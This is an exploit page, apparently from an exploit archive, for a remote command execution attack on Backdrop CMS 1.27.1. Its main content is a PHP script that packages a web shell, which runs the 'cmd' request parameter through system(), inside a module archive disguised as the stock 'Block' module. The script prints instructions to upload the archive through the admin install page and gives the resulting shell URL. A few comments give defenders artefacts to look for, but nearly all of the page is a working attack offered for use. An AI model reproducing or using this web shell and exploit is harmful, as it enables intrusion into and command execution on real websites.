## https://sploitus.com/exploit?id=PACKETSTORM:189764
=============================================================================================================================================
    | # Title     : Backdrop CMS 1.27.1 PHP Code Injection Vulnerability                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
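    [+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP. The script below sends nothing to the target: it only builds a module archive locally, and the upload step it prints (admin/modules/install) has to be performed by hand, presumably from an account that is allowed to install modules.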
    
       (Related : https://packetstorm.news/files/id/178631/ Related CVE numbers: none listed) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php [url]
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Writes the two files of the module package into ./shell/ (relative to the
     * current working directory) and returns their paths.
     *
     *  - shell/shell.info: module metadata. The text declares "type = module",
     *    "name = Block", "project = backdrop" and "version = 1.27.1", i.e. it
     *    presents the package under the name of a stock-looking module.
     *  - shell/shell.php: an HTML form plus a PHP fragment that passes the `cmd`
     *    query parameter to system() without any check.
     *
     * The return values of mkdir() and file_put_contents() are not checked, so a
     * failed write is not reported and the paths are returned regardless.
     *
     * NOTE(review): for defenders the relevant artefacts are a module directory
     * that contains a PHP file calling system() on request input, and requests to
     * that file carrying a `cmd` parameter. Reviewing who may install modules and
     * watching for new PHP files under the modules directory covers both.
     *
     * @return array Two-element list: [path of the .info file, path of the .php file].
     */
    function create_files() {
        // Module metadata written verbatim to shell/shell.info (heredoc text is runtime data).
        $info_content = <<<EOL
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x
    
    configure = admin/structure/block
    
    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    EOL;
    
        $shell_info_path = "shell/shell.info";
        if (!file_exists(dirname($shell_info_path))) {
            mkdir(dirname($shell_info_path), 0777, true); // create the folder if it does not exist yet (mode 0777, recursive)
        }
        file_put_contents($shell_info_path, $info_content);
    
        // Content of shell/shell.php. The backslash before each `$` stops the heredoc
        // from interpolating, so the written file contains literal $_SERVER / $_GET
        // references; its PHP part hands $_GET['cmd'] to system() unchanged.
        $shell_content = <<<EOL
    <html>
    <body>
    <form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset(\$_GET['cmd'])) {
        system(\$_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    EOL;
    
        // Relies on the shell/ directory created (or already present) above.
        $shell_php_path = "shell/shell.php";
        file_put_contents($shell_php_path, $shell_content);
    
        return [$shell_info_path, $shell_php_path];
    }
    
    /**
     * Packs the two generated files into shell.zip in the current working directory.
     *
     * Both files are stored under a top-level shell/ folder inside the archive
     * (shell/shell.info and shell/shell.php), whatever their paths on disk are.
     *
     * @param string $info_path Path on disk of the .info file to add.
     * @param string $php_path  Path on disk of the .php file to add.
     *
     * @return string Always "shell.zip"; the name is returned even when the archive
     *                could not be opened, so the return value does not prove that
     *                anything was written.
     */
    function create_zip($info_path, $php_path) {
        $zip_filename = "shell.zip";
        $zip = new ZipArchive();
        // open() returns TRUE on success and an error code otherwise; the error
        // case is skipped silently here.
        if ($zip->open($zip_filename, ZipArchive::CREATE) === TRUE) {
            $zip->addFile($info_path, 'shell/shell.info');
            $zip->addFile($php_path, 'shell/shell.php');
            $zip->close();
        }
        return $zip_filename;
    }
    
    /**
     * Builds the module archive and prints what to do with it.
     *
     * $url is only interpolated into the printed messages; this function makes no
     * network request. The sleep() calls only pace the console output.
     *
     * NOTE(review): the printed instructions rely on a manual upload through
     * admin/modules/install, so the technique presumably needs an authenticated
     * session that is allowed to install modules - confirm against the target's
     * permission setup. The last message names modules/shell/shell.php as the
     * location of the installed file, which is the path to look for in web-server
     * logs and on disk.
     *
     * @param string $url Base URL of the site, used verbatim in the printed messages.
     *
     * @return void
     */
    function main($url) {
        echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
        sleep(3);
    
        echo "Evil module generating...\n";
        sleep(2);
    
        // Write shell/shell.info and shell/shell.php, then pack them into shell.zip.
        list($info_path, $php_path) = create_files();
        $zip_filename = create_zip($info_path, $php_path);
    
        echo "Evil module generated! $zip_filename\n";
        sleep(2);
    
        // The upload itself is left to the operator; nothing is sent from here.
        echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
        sleep(2);
    
        echo "Your shell address: $url/modules/shell/shell.php\n";
    }
    
    // CLI entry point: $argv[1] is taken as the site URL and passed to main()
    // unchanged; without it only the usage line is printed.
    if ($argc < 2) {
        echo "Usage: php script.php [url]\n";
    } else {
        main($argv[1]);
    }
    
    ?>
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================